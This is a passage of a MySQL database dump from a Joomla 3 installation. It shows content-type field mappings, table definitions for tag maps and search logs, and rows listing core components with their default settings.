\"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(12,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(13,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(14,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(15,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'); /*!40000 ALTER TABLE `qo1a2_content_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_contentitem_tag_map` -- DROP TABLE IF EXISTS `qo1a2_contentitem_tag_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_contentitem_tag_map` ( `type_alias` varchar(255) NOT NULL DEFAULT '', `core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table', `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table', `tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table', `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item', `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table', UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`), KEY `idx_tag_type` (`tag_id`,`type_id`), KEY `idx_date_id` (`tag_date`,`tag_id`), KEY `idx_tag` (`tag_id`), KEY `idx_type` (`type_id`), KEY `idx_core_content_id` (`core_content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps items from content tables to tags'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_contentitem_tag_map` -- LOCK TABLES `qo1a2_contentitem_tag_map` WRITE; /*!40000 ALTER TABLE `qo1a2_contentitem_tag_map` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_contentitem_tag_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_core_log_searches` -- DROP TABLE IF EXISTS `qo1a2_core_log_searches`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_core_log_searches` ( `search_term` varchar(128) NOT NULL DEFAULT '', `hits` int(10) unsigned NOT NULL DEFAULT '0' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_core_log_searches` -- LOCK TABLES `qo1a2_core_log_searches` WRITE; /*!40000 ALTER TABLE `qo1a2_core_log_searches` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_core_log_searches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_extensions` -- DROP TABLE IF EXISTS `qo1a2_extensions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_extensions` ( `extension_id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL, `type` varchar(20) NOT NULL, `element` varchar(100) NOT NULL, `folder` varchar(100) NOT NULL, `client_id` tinyint(3) NOT NULL, `enabled` tinyint(3) NOT NULL DEFAULT '1', `access` int(10) unsigned NOT NULL DEFAULT '1', `protected` tinyint(3) NOT NULL DEFAULT '0', `manifest_cache` text NOT NULL, `params` text NOT NULL, `custom_data` text NOT NULL, `system_data` text NOT NULL, `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) DEFAULT '0', `state` int(11) DEFAULT '0', PRIMARY KEY (`extension_id`), KEY `element_clientid` (`element`,`client_id`), KEY `element_folder_clientid` (`element`,`folder`,`client_id`), KEY `extension` (`type`,`element`,`folder`,`client_id`) ) ENGINE=InnoDB AUTO_INCREMENT=701 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_extensions` -- LOCK TABLES `qo1a2_extensions` WRITE; /*!40000 ALTER TABLE `qo1a2_extensions` DISABLE KEYS */; INSERT INTO `qo1a2_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\",\"save_history\":\"1\",\"history_limit\":10}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"Unknown\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2008 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_contact_category\":\"hide\",\"save_history\":\"1\",\"history_limit\":10,\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"newsfeed_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_character_count\":\"0\",\"feed_display_order\":\"des\",\"float_first\":\"right\",\"float_second\":\"right\",\"show_tags\":\"1\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_items\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_items_cat\":\"1\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"target\":\"0\",\"save_history\":\"1\",\"history_limit\":5,\"count_clicks\":\"1\",\"icons\":1,\"link_icons\":\"\",\"float_first\":\"right\",\"float_second\":\"right\",\"show_tags\":\"1\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_num_links\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_links_cat\":\"1\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"0\",\"show_link_description\":\"1\",\"show_link_hits\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"1\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"100\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_hits\":\"1\",\"show_noauth\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"1\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"10\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"12\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 